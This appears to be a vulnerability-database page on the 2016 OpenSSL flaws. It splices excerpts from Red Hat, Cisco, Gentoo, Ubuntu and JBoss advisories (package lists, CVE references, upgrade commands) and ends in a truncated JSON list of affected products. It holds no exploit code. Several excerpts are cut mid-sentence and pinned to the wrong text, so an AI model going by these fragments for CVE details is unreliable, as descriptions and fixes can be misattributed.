x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Of these 14 vulnerabilities, the OpenSSL Software Foundation classifies one as aCritical Severity,a one as aModerate Severity,a and the other 12 as aLow Severity.a
Subsequently, on September 26, the OpenSSL Software Foundation released an additional advisory that describes two new vulnerabilities. One of the new vulnerabilities was rated as aHigh Severitya and the other as aModerate Severity.a
Of the 16 released vulnerabilities: Fourteen track issues that could result in a denial of service (DoS) condition One (CVE-2016-2183, aka SWEET32) tracks an implementation of a Birthday attack against Transport Layer Security (TLS) block ciphers that use a 64-bit block size that could result in loss of confidentiality One (CVE-2016-2178) is a timing side-channel attack that, in specific circumstances, could allow an attacker to derive the private DSA key that belongs to another user or service running on the same system
Five of the 16 vulnerabilities affect exclusively the recently released OpenSSL versions that belong to the 1.1.0 code train, which has not yet been integrated into any Cisco product.
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Description:
Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.
This release includes bug fixes as well as a new release of OpenSSL. For further information, see the knowledge base article linked to in the References section. The JBoss server process must be restarted for the update to take effect. After installing the updated packages, the httpd daemon will be restarted automatically. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat. Solution:
The References section of this erratum contains a download link (you must log in to download the update). JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
6
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201606-0477", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "5" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "6" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "7" }, { "model": "solaris", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "10" }, { "model": "solaris", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "11.3" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "5.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.12.16" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.2.0" }, { "model": "linux enterprise", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "4.6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "4.1.2" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.10.47" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.12.0" }, { "model": "openssl", "scope": "lte", "trust": 0.8, "vendor": "openssl", "version": "1.0.2h" }, { "model": "linux enterprise module for web scripting", "scope": "eq", "trust": 0.8, "vendor": "suse", "version": "12" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "cloud web security", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3.0.1098" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.4.1102" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.4.7895" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.2.1.1" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.2.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.1.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.2" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.1" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.4.1.5.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": 